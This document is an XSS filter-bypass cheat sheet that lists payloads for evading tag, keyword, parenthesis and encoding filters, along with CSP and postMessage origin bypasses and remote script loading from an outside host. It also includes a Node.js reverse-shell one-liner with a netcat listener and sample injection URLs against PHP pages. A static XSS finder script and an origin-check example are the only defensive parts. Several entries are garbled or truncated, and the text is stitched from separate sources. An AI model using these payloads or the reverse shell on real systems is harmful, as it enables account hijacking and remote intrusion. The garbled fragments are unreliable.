XSS bypass ideas

1. Front-end restriction bypass (e.g. JavaScript checks): capture the request, modify it and replay it, or edit the front-end HTML directly.
2. Case variation, e.g.: <SCript> alERT(/XSS/) </SCript>
3. Splicing: <scri<script>pt> alert(/XSS/) </scri</script>pt>
4. Using comments as interference: <scr<!--test-->ipt>alert(/xss/)</s<!--test-->cript>
The back end filters special characters such as the <script> tag, but the tag can be written in various encodings that the back end does not necessarily filter; when the browser recognises the encoding it turns it back into the normal tag and executes it.
5. Closing the surrounding tags, e.g.: 1"><script>alert(/XSS/)</script><
6. < and > are filtered but " is not: trigger an event handler
" onmouseover =alert(document.domain) name="1   or   " onmouseover=alert(document.domain)%0a
onmouseover is the event fired when the mouse moves over the element
" onclick=alert(document.domain) name="1
onclick is the event fired on a mouse click
7. >, <, " and the space are filtered, and everything after a space is truncated
" onmouseover =alert(document.domain) name="1
" onmouseover =alert(document.domain)
test onmouseover=alert(document.domain)
8. URL inside an <a> tag hyperlink
9. script is replaced with xscript, on-event names with onxxx and style with stxxx; tab (%09), newline (%0a, %0d, %0a%0d) and similar characters do not help.
javascript:alert(document.domain)
Build an <a> tag whose hyperlink runs JS, encoding any one letter of "script" (here the s, as the HTML decimal character reference &#115;):
"><a href="java&#115;cript:alert(document.domain)">1</a>
10. <, >, " and space are replaced with nothing. Can encoding bypass this? HTML entities cannot, because <, > and " are filtered and an entity cannot make the content break out of the attribute. IE, however, treats the backtick ` (the key left of 1 on a laptop keyboard, pressed twice) as a double quote, which lets the content break out (since < and > cannot be recovered, set an attribute instead):
``onmouseover=alert(document.domain)
11. < becomes &lt; and > becomes &gt;
Hex escape bypass: \x3cscript\x3ealert(document.domain);\x3c/script\x3e
Unicode escape bypass: \u003e\u003cscript\u003ealert(document.domain)\u003c/script\u003e
Online hex encoder/decoder: https://www.cnblogs.com/gggzly/p/8853779.html
Online Unicode encoder: https://www.css-js.com/tools/unicode.html
<img src=x onerror="top['al'+'ert'](http://0)"></img>
1">)<img src=1>
<img src="x" onerror="&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;">
<img src=1 onerror=alert(1)>

Reflected XSS

Persistent XSS

DOM-based XSS

Mutation XSS

Universal Cross-site Scripting (UXSS)


Mannix

">"><"<"

javascript keyword filter, + (plus sign) filter

document.cookie

document['coo''CONCAT'.toLowerCase()]

Parenthesis filter

alert(1)

alert`1`

; (semicolon) filter

Single, double and backtick quote filter

eval(String.fromCharCode(97,108,101,114,116,40,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,41))//

. (dot) filter

with(location)alert(hash)

HTML tag filter, attribute name filter

<video width="0" height="0" oncanplay=alert0>

Tags that carry event handlers: img, svg, body, html, embed, script, object, details, isindex, iframe, audio, video

alert filtered

top['aler'+'t']

[1].find(confirm)

[1].map(confirm)

[1].some(confirm)

[1].every(confirm)

[1].filter(confirm)

[1].findIndex(confirm)

[1].map(alert)

[1].find(alert)

[1].every(alert)

[1].filter(alert)

[1].findIndex(alert)

[1].some(alert)

alert(document.domain)

YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ==

<svg onload=eval(atob`YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ==`)>

<svg onload=eval(atob`YWxlcnQoMSk=`)>

<svg onload=setTimeout(atob`YWxlcnQoMSk=`)>

<svg onload=setInterval(atob`YWxlcnQoMSk=`)>

<svg onload=selfev+al>

Pop-up appears in the bottom-right or top-left corner

HTML Context – Simple Tag Injection

">

HTML Context – In Block Tag Injection

">

HTML Context – Inline Injection

"onmouseover=alert(1)//

"autofocus/onfocus=alert(1)//

HTML Context – Source Injection

href, src, data

,action,formaction

data:,alert(1)

javascript:alert(1)

data:text/html,

Javascript Context – Code Injection

'-alert(1)-'

'-alert(1)//

Operators that can join the injected code to the surrounding JavaScript:

+(%2b) - * / % ^ < > <= >= == === != !== ; | %0a %0A %0d %0D %0a%0d %0A%0D //

t.mhz.pw/game/xss/sc…


Javascript Context – Code Injection with Escape Bypass

'-alert(1)//

Javascript Context – Code Injection in Logical Block

'}alert(1);{'

'}alert(1)%0A{'

'}alert(1);{//

Javascript Context – Tag Injection

Multi Reflection – Double Reflection (Single Input)

'onload=alert(1)><svg/1='

'>alert(1)<script/1='

/alert(1)

Multi Reflection – Triple Reflection (Single Input)

/alert(1)">'onload="/ <svg/1='

-alert(1)">'onload="<svg/1='

/'>alert(1)/ <script/1='

Multi Input Reflections (Double & Triple)

p=<svg/1='&q='onload=alert(1)>

p=<svg 1='&q='onload='/ &r=/alert(1)'>

File Upload Injection – Filename

">

File Upload Injection – Metadata

exiftool -Artist='">

File Upload Injection – SVG File

DOM Insert Injection

DOM Insert Injection – Resource Request

data:text/html,


PHP_SELF Injection

brutelogic.com.br/xss.php/">

Script Injection – No Closing

Unclosed Tags

<svg onload=alert(1)//

<svg onload="alert(1)"

Uppercase XSS

Extra Content for Script Tags

<script/x>alert(1)

Double Encoded XSS

%253Csvg%2520o%256Enoad%253Dalert%25281%2529%253E

%2522%253E%253Csvg%2520o%256Enoad%253Dalert%25281%2529%253E

Alert without Parentheses (Strings Only)

alert`1`

Alert without Parentheses

setInterval`alert\x28document.domain\x29`

setTimeout`alert\x28document.domain\x29`

Alert without Parentheses (Tag Exclusive)

Alert without Alphabetic Chars

[]['\146\151\154\164\145\162']['\143\157\156\163\164\162\165\143\164\157\162']

('\141\154\145\162\164\50\61\51')()

Alert Obfuscation

top window parent self this frames

(alert)(1)

a=alert,a(1)

[1].find(alert)

top["al"+"ert"]

top[/al/.source+/ert/.source]

al\u0065rt(1)

top['al\145rt']

top8680439…toString(30)

File Upload Injection – HTML/js GIF Disguise

GIF89a=//

alert(1)//;

Jump to URL Fragment

eval(URL.slice(-8)) #alert(1)

eval(location.hash.slice(1)) #alert(1)

document.write(decodeURI(location.hash)) #<img/src/onerror=alert(1)>

<svg/onload=innerHTML=location.hash> #<img/src/onerror=alert(1)> (Webkit only)

HTML Alternative Separators

Tag Scheme:

<name [1] attrib [2] = [3] value [4] handler [5] = [6] js [7]>

[1], [2], [5] => %09, %0A, %0C, %0D, %20, / and +

[3] & [4] => %09, %0A, %0C, %0D, %20, + and ' or " in both

[6] & [7] => %09, %0A, %0B, %0C, %0D, %20, /, + and ' or " in both

Strip Tags Based Bypass

"onmouseover=alert(1)//

"autofocus onfocus=alert(1)//

2nd Order XSS Injection

<svg/onload=alert(1)>

Event Origin Bypass for postMessage() XSS

facebook.com.localhost/crosspwn.ph…?

target=//brutelogic.com.br/tests/status.html&msg=

CSP Bypass (for Whitelisted Google Domains)

{{constructor.constructor('alert(1)')()}}

Vectors without Event Handlers

Javascript Execution Delay

onload=function(){$.getScript('//brutelogic.com.br/2.js')}

onload=x=>$.getScript('//brutelogic.com.br/2.js')

Valid Source for Image Tags

<img src= onload=alert(1)>

Shortest XSS

Mobile-only Event Handlers

Body Tag

Less Known XSS Vectors

target=//brutelogic.com.br/tests/status.html&msg=

Where "facebook.com" is an allowed origin and "localhost" is the attacking domain, "//brutelogic.com.br/tests/status.html" is the target page and

http://localhost/crosspwn.php?target=//brutelogic.com.br/xss.php?a=<body/onresize=alert(document.domain)>

http://localhost/crosspwn.php?target=//brutelogic.com.br/xss.php?a=<svg/onload=eval(name)>&name=alert(document.domain)

CrossPwn

name="<?php echo $_GET['name'] ?>" height="0" style="visibility:hidden">
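The postMessage() origin bypass entry above works because the receiving page matches event.origin loosely, so a host such as "facebook.com.localhost" passes as if it were "facebook.com". As an added example (not the original post's or CrossPwn's code), the weak check below is an assumed reconstruction of such a substring test, shown beside an exact-match allowlist; the origins, allowlist and messages are constructed.

```javascript
// Added example (not from the original post). The "weak" check is an assumed
// reconstruction of the kind of origin test the bypass depends on, not the
// target page's actual code.

// Constructed allowlist: full origins (scheme + host [+ port]), nothing looser.
const ALLOWED_ORIGINS = ["https://facebook.com", "https://www.facebook.com"];

// Weak: substring matching lets "https://facebook.com.localhost" through.
function weakOriginCheck(origin) {
  return origin.indexOf("facebook.com") !== -1;
}

// Correct: exact comparison of the whole origin string against the allowlist.
function strictOriginCheck(origin) {
  return ALLOWED_ORIGINS.includes(origin);
}

// Handler shaped like a typical message listener: ignore untrusted origins,
// and even for trusted ones treat event.data as text, never as HTML or code.
function handleMessage(event, check) {
  if (!check(event.origin)) return null;      // drop silently
  return String(event.data);                   // caller renders via textContent
}

// Constructed messages: one from the real origin, one from an attacker host.
const legit = { origin: "https://facebook.com", data: "hello" };
const spoofed = { origin: "https://facebook.com.localhost", data: "attacker-controlled data" };

function demo() {
  return {
    weakAcceptsSpoof: handleMessage(spoofed, weakOriginCheck) !== null,     // true
    strictAcceptsSpoof: handleMessage(spoofed, strictOriginCheck) !== null, // false
    strictAcceptsLegit: handleMessage(legit, strictOriginCheck) !== null,   // true
  };
}
```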

Simple XSS Finder Script for PHP (Static Analysis)

```bash
#!/bin/bash
# Usage: ./xssfinder.sh FILE   or   ./xssfinder.sh -r FOLDER
if [ -z "$1" ]
then
  echo -e "Usage:\n$0 FILE\n$0 -r FOLDER"
  exit
else
  f=$1
fi
# Superglobals that carry user input (sources). The "[" is escaped so grep
# treats it literally instead of opening a bracket expression.
sources=(GET POST REQUEST "SERVER\['PHP" "SERVER\['PATH_" "SERVER\['REQUEST_U")
# Output functions that write into the response (sinks); "?" also catches "<?="
sinks=(? echo die print printf print_r var_dump)
xssam(){
  for i in "${sources[@]}"
  do
    # variables assigned from this source, e.g. $name = $_GET['name']
    a=$(grep -in "\$_${i}" "$f" | grep -o "\$.*=" | sed -E "s/ ?=//g" | sort -u)
    for j in "${sinks[@]}"
    do
      # source used directly inside a sink on the same line
      grep --color -in "${j}.*\$_${i}" "$f"
      for k in $a
      do
        # variable derived from the source used inside a sink
        grep --color -in "${j}.*${k}" "$f"
      done
    done
  done
}
if [ "$f" != "-r" ]
then
  xssam
else
  for i in $(find "$2" -type f -name "*.php")
  do
    echo "File: $i"
    f=$i
    xssam
  done
fi
```

Node.js RCE

Javascript:

require('child_process').exec('bash -c "bash -i >& /dev/tcp/HOST/5855 0>&1"')

nc -lp 5855

ASCII Encoding Table

Remember to replace "&" and "#" in URLs with their encoded versions (%26 and %23 respectively).

http://127.0.0.1/assets/edit/ssl-provider-account.php?del=1&sslpaid=%27%22%28%29%26%25%3Cacx%3E%3CScRiPt%20%3Eprompt%28931289%29%3C/ScRiPt%3E

'"()%26%25

http://127.0.0.1/assets/edit/account-owner.php?del=1&oid=%27%22%28%29%26%25%3Cacx%3E%3CScRiPt%20%3Eprompt%28973761%29%3C/ScRiPt%3E

'"()%26%25